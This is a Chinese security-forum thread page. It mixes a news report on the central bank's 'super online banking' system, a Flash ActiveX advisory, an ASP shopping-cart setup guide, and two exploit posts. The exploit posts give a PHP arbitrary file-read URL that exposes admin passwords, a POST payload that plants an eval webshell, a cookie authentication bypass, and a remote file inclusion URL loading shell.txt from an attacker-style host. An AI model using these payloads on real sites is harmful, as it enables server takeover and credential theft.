返回列表 发帖

“超级网银”开网络支付新时代 应警惕短板效应

  新华网广州10月4日电 **王凯蕾、黄玫

  央行新一代标准化跨银行网上支付清算系统——“超级网银”已试运行满月。

  十一长假期间,**在调查中了解到,“超级网银”可以随时随地进行跨行查询和支付结算,方便快捷,给外出度假的市民管理银行账户提供了一个便利的渠道。多数民众期待试运行结束后“超级网银”能出台合理的收费标准。

  业内人士指出,“超级网银”实现了单个用户跨行进行资金管理和结算,有效整合了不同银行之间的业务资源,开启了网络支付的新时代,建议有关部门加强可靠性和安全性测试,防范“短板效应”引发的安全隐患。

  试运行业务量稳步上升 “在线银联”雏形初现

  广州市越秀区居民刘明秋在工商银行网银上进行操作,签约程序耗时3分钟,便可以进行同城、异地跨行转账支付、账户查询等业务。

  “真的很方便,不仅实现了异地跨行转账实时到账,还可以查询自己在不同银行内的账户余额、消费明细等信息,感觉像是在使用在线版的银联。”刘明秋说。

  据了解,在使用“超级网银”前,用户首先需要成为签约客户。目前登陆各家银行的网上银行系统主页,在“我的账户”——“账户管理”——“他行(互联)账户查询/签约”下面,一般都可以找到并进行相关的操作选项。

  来自中国银行广东省分行的数据显示,“超级网银”自2010年8月30日在该行上线运行以来,客户首日成功办理支付转账业务200多笔,8月31日400多笔,随后业务量呈稳步增长态势。截至9月末,监测数据显示“超级网银”各项运行指标良好,客户参与积极性非常高。

  业内专家指出,由于息差收益相对固定,中间业务已经成为银行新的利润增长点,各家银行之间在中间业务上展开的竞争也将更为激烈。大力推动电子银行、网上银行业务已成为中国银行业未来发展的方向。“超级网银”系统平台的适时启动并得以平稳运行,让各银行可以在此基础上提供个性化服务,通过差异化的竞争获得超额收益。

  公众期待“超级网银”收费迈向平民化

  **了解到,目前“超级网银”的收费标准与普通商业银行网上业务的收费标准相差不大。例如,交通银行的普通异地跨行汇款收费标准为,转账金额的7‰,最低2元/笔,最高50元/笔;如果采用“快速汇款”,收费标准为转账金额的2‰,最低2元/笔,最高20元/笔。

  在转账费率方面,多家银行的“跨行快速汇款”与普通跨行转账的费率相同。例如,工商银行的“跨行快速汇款”,手续费是按汇款金额0.9%收取,每笔业务最低1.8元,最高45元。

  “既然"超级网银"整合了不同银行之间的业务资源,那么正式推广形成规模效应以后,其收费理应低于目前网银的费用水平,或者在某些项目上不收费才合理。”广东深天成律师事务所郑绪华律师说。

  但事实上,目前,只有部分银行宣布暂时不收取跨行转账手续费,而大部分银行公布的收费水平均不低于现有普通网银。而且,据业内人士透露,“超级网银”全部功能开放之后,多项费用还有可能会高于第一代网银。

  “如果"超级网银"的手续费标准高于普通网银或者银联,那么我暂时不会使用。相信用"平民化"的收费标准才可以吸引到更多的消费者参与其中形成规模效应,这样各方都能受益。”消费者刘孜说。

  应警惕“短板效应”引发的安全隐患

  业内专家指出,随着“超级网银”在线交易规模的扩大,由此衍生的交易安全风险也将随之提高。而且,由于接入的各家网银安全等级不一,还涉及不同网银之间的信息对接,因此,一旦出现安全漏洞,被黑客抓住攻击,其后果将不堪设想。

  工商银行广东省分行电子银行部副总经理谢翔表示,“超级网银”对各个银行的网银安全性提出了更高的要求,因为客户登录某家网银,其安全性直接关系到该客户其他银行账户的安全。

  “"超级网银"的安全性实际上是由接入整个系统平台中安全系数最差的那家网银所决定的,安全系数最差的那家网银就是系统中的"短板",因此必须警惕"短板效应"所引发的安全隐患。”谢翔说。

  有关专家认为,保证“超级网银”这个庞大信息平台安全运转是包括央行在内的各家金融机构责无旁贷的义务。“超级网银”实现了实时跨行转账和跨行账户实时管理,将引领整个银行业进入一个更加高效和便捷的时代。

 

您可能还想看的主题:

新手来论坛学习

美国发明了网络数字大炮,可摧毁整个互联网

马化腾:Android时代将存在安全危机

花旗支付注入漏洞

SQL注入是什么情况?

网络渗透测试指导

FaceBook创始人马克·扎克伯格获评《时代》年度人物

黑客讲述网络中的暗战:充斥财富、阴谋和暴力

阿桑奇昨日获准被保释 支付38万美元保证金

饭客网络思科陆游全套教程

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

多个远程代码执行漏洞
影响版本:
Macromedia Flash 6.0.79 .0
Macromedia Flash 6.0.65 .0
Macromedia Flash 6.0.47 .0
Macromedia Flash 6.0.40 .0
Macromedia Flash 6.0.29 .0
Macromedia Flash 6.0
Macromedia Flash 6.0.88.0
漏洞描述:
Bugraq ID: 37753

Adobe Flash Player是一款Flash文件处理程序。
Microsoft Windows XP提供的Macromedia Flash ActiveX控件存在内存破坏问题,允许远程攻击者在系统上执行任意代码。
Microsoft Windows XP提供Macromedia Flash ActiveX控件的早期版本,根据补丁级别不同,由flash.ocx或flash6.ocx提供。部分与这个ActiveX控件的交互存在堆内存破坏问题,可导致任意代码执行。这个漏洞不影响Flash 9或之后的安装版本。
通过诱使用户访问特殊构建的HTML文档可触发此漏洞。
<*参考
http://www.kb.cert.org/vuls/id/204889http://www.microsoft.com/technet/security/advisory/979267.mspxhttp://blogs.adobe.com/psirt/2010/01/microsoft_security_advisory_97.html*>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Win2000服务器设置全攻略(十一)
注意:1/2)本文限在局域网中;2/2)本文未特定指出处,均使用其默认选项。 九、网上购物 (一)关于本网上购物程序 1、本网上购物程序使用ASP编程结合调用Access数据库来实现 2、本网上购物程序选自“旗标系列图书”《Active Server Pages &amp; Web数据库》(王国荣 著;朱琳杰、王伟 改编;人民邮电出版社)。在具体使用中,我发现了一些问题,并作了相应的修改 1/4)原文选定欲购物品后(buy.asp)会进入一个近似空白的确认页面(add.asp)——改成自动转入购物袋(check.asp)的页面。如下图:  2/4)原文的购物袋(check.asp)中,当所有的复选框均未选中时,按“更改数量”按钮会有出错信息——改成直接跳转到空物袋(clear.asp)所在页。如下图:  3/4)原文的购物袋(check.asp)中,当“数量”输入<=0的数时,是没有任何更改效果的操作——改成删除相应记录。如下图:  以及下图:  4/4)原文当按了“退回所有物品”后,进入空物袋的页面,但Session并没有清除——改成清除所有Session。如下图:  3、我98%不懂ASP,因此除了不能用之外,其他的修改,请不要问我 (二)使用说明 1、下载 1/2)压缩文件内包括9个源文件及本说明文件(readme.htm),共约281K 2/2)地址:http://nanshan.363.net/down/sale.zip 2、安装 1/2)在C:Inetpubwwwroot(所设WWW的根目录)下建立一个名为sale的文件夹,将得到的sale.zip文件解压到sale中 2/2)调用网址为:http://www.lianhe.com/sale/main.asp 3、使用 1/4)进入http://www.lianhe.com/sale/main.asp后,即为该网上购物的主页面。如下图:  2/4)比如欲选“圣诞节礼物”。如下图:  3/4)进入购物袋后,可更改所选物品的数量、删除部分(将复选框的勾去掉或将“数量”设为0)或全部(选“退回所有物品”)物品等。如下图:  4/4)欲改商品编号、名称、单价、简介等,可用Access打开shopbag.mdb来实现。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

搜搜问问小偷程序天宇版任意文件读取漏洞
下载地址:http://down.chinaz.com/soft/27853.htm


1、前台任意文件读取漏洞:


img.php文件代码


<?php
$p=$_GET['p'];
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>
典型任意文件读取没有任何验证


利用方法:/img.php?p=./admin/data.php


读取管理员帐号密码 明文的哦


2、后台任意代码写入:


admin_ad.php 最后一段代码


<?
}elseif ($_GET['action']=="add"){
        //echo $_POST['js_mb'];
        $file="../ad/".$_POST['js_file'];
        $fp=fopen($file,"w");
        fwrite($fp,stripslashes($_POST['js_mb']));
        fclose($fp);
        echo"<script>alert('修改成功!');location.href='?id=ad';</script>";
}
?>
利用 发送POST数据


path:/admin/admin_ad.php?action=add


POST数据包:js_file=x.php&amp;js_mb=<?php eval($_POST[cmd]);?>


既可在网站ad 目录下生成一个x.php的一句话木马 密码cmd


该文件头部,验证不足:


<?
include('data.php');
if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){
        echo"<script>location.href='index.php';</script>";
        exit;
}
?>
逻辑错误知道其一即可绕过


后台的权限验证问题,设置Cookie:x_Cookie=用户名 或 y_Cookie 等于密码即可通过验证


if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){


这个逻辑漏洞很狗血,作者一定是蛋爆了才会这么写……


正确的应该为:


if($_COOKIE['x_Cookie']!=$adminname or $_COOKIE['y_Cookie']!=$password){


或者:


if($_COOKIE['x_Cookie']==$adminname and $_COOKIE['y_Cookie']==$password){


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Poppawid 远程文件包含漏洞
#Poppawid Remote File include#f0und bY 0in#Greetings to: All Dark-Coders Team Members#IRC: #dark-coders at warszawa.irc.pl#About:popper_mod-wid is a free (and popular), full featured web based email client#Download:http://poppawid.sourceforge.net/#No dork for script kiddies..;]#Register_globals=On#BUG:poppawid/mail/childwindow.inc.php:33:                                   <?php include($form.".form.inc.php");?>Expl0it:http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表